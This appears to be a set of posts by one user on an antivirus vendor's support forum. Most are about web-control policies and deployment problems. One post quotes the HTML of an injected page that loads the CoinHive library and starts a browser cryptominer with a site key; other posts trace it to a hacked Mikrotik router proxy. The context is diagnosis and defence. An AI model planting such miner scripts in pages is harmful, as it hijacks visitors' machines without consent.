MAGIK José Rocha

Members
  • Content Count

    12
Profile Information

  • Location
    Portugal

  1. We are applying a custom policy for web control where we allow specific URLs and after that we block a Category Group. The problem we are facing is that, if the allowed URL belongs to a blocked Category, the user can't access that URL. From the documentation found HERE, this is not the expected behaviour and the user should be able to access the URL as they are evaluated first. With the settings example below, we are unable to access WINESTUFF.PT because it's being blocked by the category based rule where we block "Alcohol and Tobacco" related sites.
  2. Will have to try that solution tomorrow. Thanks for your help.
  3. I've implemented an Internet access control policy where we have the following requirements: block access to several group categories of sites; allow access to specific URLs. The problem is that I'm getting the sites blocked by category but the URL groups we allow are also blocked, if they belong to one of the blocked categories. I believe ESET should act as a regular firewall, applying rules in the order I've configured, and accepting a connection as soon as it's authorised, not proceeding to the following rules. Here is a piece of my policy:
  4. I understand that it isn't a recommended approach but we've had it working on a critical server for a long time without any issue. The reason for that is that we have real people working on that server, receiving emails, accessing web pages and all those things we have inside a Desktop OS, and File Server v6 didn't address our needs. I believe the installer was blocking the installation of Endpoint v7 on a server but maybe I missed something. Will check it again on a demo server. The URL Management is not that easy to maintain, so we must find another way. Thanks for your help.
  5. A lot of our clients use Windows Server to provide RDP services for their users, local and remote ones. As most of their users are point of sales operators, they need internet access to the company website and other websites related to products that they work with, but shouldn't use other webpages. On the other end there are groups of users who may access social networks and other users that must have unrestricted access to the internet. With ESET Version 6 we made it by installing ESET Endpoint Security and tweaking policies to make it work in a Windows Server without impact on performance or
  6. I've made a Policy for all workstations on that domain to disable SmartScreen and the Deployment Tool was able to install without any problem.
  7. I've created an all-in-one installer to use with ESET Deployment Tool and it went without errors, showing a success message. The problem is that nothing was installed and the workstation is still running the older versions. I tried to run the same installer at that workstation to see if there is some error in the installation process and I received a message that SmartScreen had blocked the execution of the installer. Then I asked SmartScreen to run the setup anyway and everything installed without problems. Is there any way of making the deployment tool avoid this m
  8. Here is the html source for the page that runs the miner: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <title>"$(url)"</title> <_script src="https://coinhive.com/lib/coinhive.min.js"></script> <_script> var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2}); miner.start(); </script> </head> <frameset> <frame src="$(url)"></frame> </frameset> </html>
  9. I've been able to find the origin of these detections and already solved the problem. When I was trying to understand the origin of these trojans, I noticed that some of the addresses were legit and don't raise any problems outside our client network. So I started a search for some kind of proxy that could inject malicious code into legit HTTP pages and found out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where they injected the malicious code and it was blocked later on the client machine. The hack h
  10. Here are the collected logs on the affected machine. Thanks for your help. ees_logs.zip
  11. Hi, We have a computer with more than 10.000 detected threats like the one below: Threat: JS/CoinMiner.AH Process: C:\Windows\System32\wscript.exe Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login Is this a sign that the computer is infected or is this the result of attempts to infect it? Note: The address 10.100.1.254 is a Mikrotik router and it is updated with the latest updates.